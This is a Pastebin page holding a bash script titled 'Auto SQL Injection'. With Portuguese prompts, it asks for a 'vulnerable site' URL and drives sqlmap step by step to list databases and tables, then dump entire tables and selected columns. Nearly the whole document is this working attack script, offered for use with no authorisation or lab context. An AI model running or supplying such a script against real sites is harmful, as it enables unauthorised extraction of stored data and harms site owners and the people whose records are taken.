Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- clear
- echo " / \ | | | |_ _/ _ \ / ___| / _ \| |"
- echo " / _ \| | | | | || | | | \___ \| | | | |"
- echo " / ___ \ |_| | | || |_| | ___) | |_| | |_"__
- echo "/_/ \_\___/ |_| \___/ |____/ \__\_\_____|"
- echo " ___ _ _ _ _____ ____ _____ ___ ___ _ _"
- echo "|_ _| \ | | | | ____/ ___|_ _|_ _/ _ | \ | |"
- echo " | || \| |_ | | _|| | | | | | | | | \| |"
- echo " | || |\ | |_| | |__| |___ | | | | |_| | |\ |"
- echo "|___|_| \_|\___/|_____\____| |_| |___\___/|_| \_|"
- echo "====================================================="
- echo -e " \033[0;34m Auto SQL Injection. | by:Tr3v0r- \033[0m"
- echo "====================================================="
- # Colors
- blue="\033[0;34m"
- red="\033[0;31m"
- green="\033[0;32m"
- echo -e " \033[0;34m Entre com o site vulnerável -->\033[0m"
- read sitevull
- python sqlmap.py -u $sitevull --dbs
- echo -e " \033[0;34m digite o nome da database -->\033[0m"
- read tabela
- python sqlmap.py -u $sitevull -D $tabela --tables
- echo -e " \033[0;34m Digite a tabela -->\033[0m"
- read tabela2
- python sqlmap.py -u $sitevull -D $tabela -T $tabela2 --dump
- echo -e " \033[0;34m Digite a coluna -->\033[0m"
- read coluna
- python sqlmap.py -u $sitevull -D $tabela -T $tabela2 -C $coluna --dump
- echo "Do not copy, be creative! = D"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement